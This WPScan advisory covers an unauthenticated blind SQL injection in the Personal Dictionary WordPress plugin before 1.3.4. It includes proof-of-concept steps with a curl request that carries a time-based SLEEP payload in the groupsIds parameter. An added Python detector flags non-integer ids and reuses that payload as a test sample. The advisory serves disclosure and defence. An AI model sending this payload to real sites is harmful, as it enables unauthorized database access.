wpvulndb | Cydave | WPVDB-ID:EED70659-9E3E-42A2-B427-56C52E0FBC0D
History: Apr 18, 2022 - 12:00 a.m.

Personal Dictionary < 1.3.4 - Unauthenticated SQLi

2022-04-18 00:00:00
cydave
wpscan.com
6

EPSS: 0.016 (Low)
Percentile: 87.5%

The plugin does not properly sanitize user-supplied POST data before interpolating it into an SQL statement that is then executed, leading to a blind SQL injection vulnerability.

PoC

1. Create a new page with the plugin’s shortcode (the shortcode can be copied from /wp-admin/admin.php?page=personal-dictionary).
2. Visit the page (as admin) with the shortcode and create a new group (any name is fine).
3. Click on the created group and add a new word to it (the word and its translation don’t matter), then hit save and close.
4. Invoke the following curl command to induce a 5 second sleep:

curl 'http://127.0.0.1:8080/wp-admin/admin-ajax.php' --data 'action=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1) AND (SELECT 3892 FROM (SELECT(SLEEP(5)))pFvo)-- P'
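
A defensive check for the request described above, added here as an example (it is not code from the advisory or the plugin): it parses a form-encoded admin-ajax.php POST body and reports any groupsIds value that is not a plain integer. The parameter names come from the PoC request; the function name suspicious_group_ids and the 10-digit limit on ids are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Handler and parameter names are taken from the advisory's PoC request.
ACTION = "ays_pd_ajax"
FUNCTION = "ays_pd_game_find_word"
# PHP builds the same array from groupsIds[], groupsIds[0], ... so match all forms.
ID_KEY = re.compile(r"groupsIds(\[[^\]]*\])?")
# Assumption: legitimate group ids are short, ASCII-only decimal integers.
PLAIN_INT = re.compile(r"[0-9]{1,10}")


def suspicious_group_ids(body):
    """Return the groupsIds values that are not plain integers.

    An empty list means the body is clean or targets a different handler.
    """
    # parse_qsl percent-decodes names and values (groupsIds%5B%5D -> groupsIds[]).
    pairs = parse_qsl(body, keep_blank_values=True)
    fields = {k: v for k, v in pairs if not ID_KEY.fullmatch(k)}
    if fields.get("action") != ACTION or fields.get("function") != FUNCTION:
        return []
    return [v for k, v in pairs
            if ID_KEY.fullmatch(k) and not PLAIN_INT.fullmatch(v)]


# Constructed sample bodies; "advisory_poc" reuses the value shown in the PoC.
SAMPLES = {
    "normal": "action=ays_pd_ajax&function=ays_pd_game_find_word"
              "&groupsIds%5B%5D=1&groupsIds%5B%5D=7",
    "advisory_poc": "action=ays_pd_ajax&function=ays_pd_game_find_word"
                    "&groupsIds[]=1) AND (SELECT 3892 FROM (SELECT(SLEEP(5)))pFvo)-- P",
    "blank_id": "action=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[0]=",
    "other_action": "action=heartbeat&groupsIds[]=abc",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        hits = suspicious_group_ids(body)
        print(f"{name}: {'ALERT ' + repr(hits) if hits else 'ok'}")
```

The same integer-only rule can be enforced in a WAF or reverse proxy in front of sites that cannot yet be updated to 1.3.4.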

CPE | Name | Operator | Version
- | personal-dictionary | lt | 1.3.4
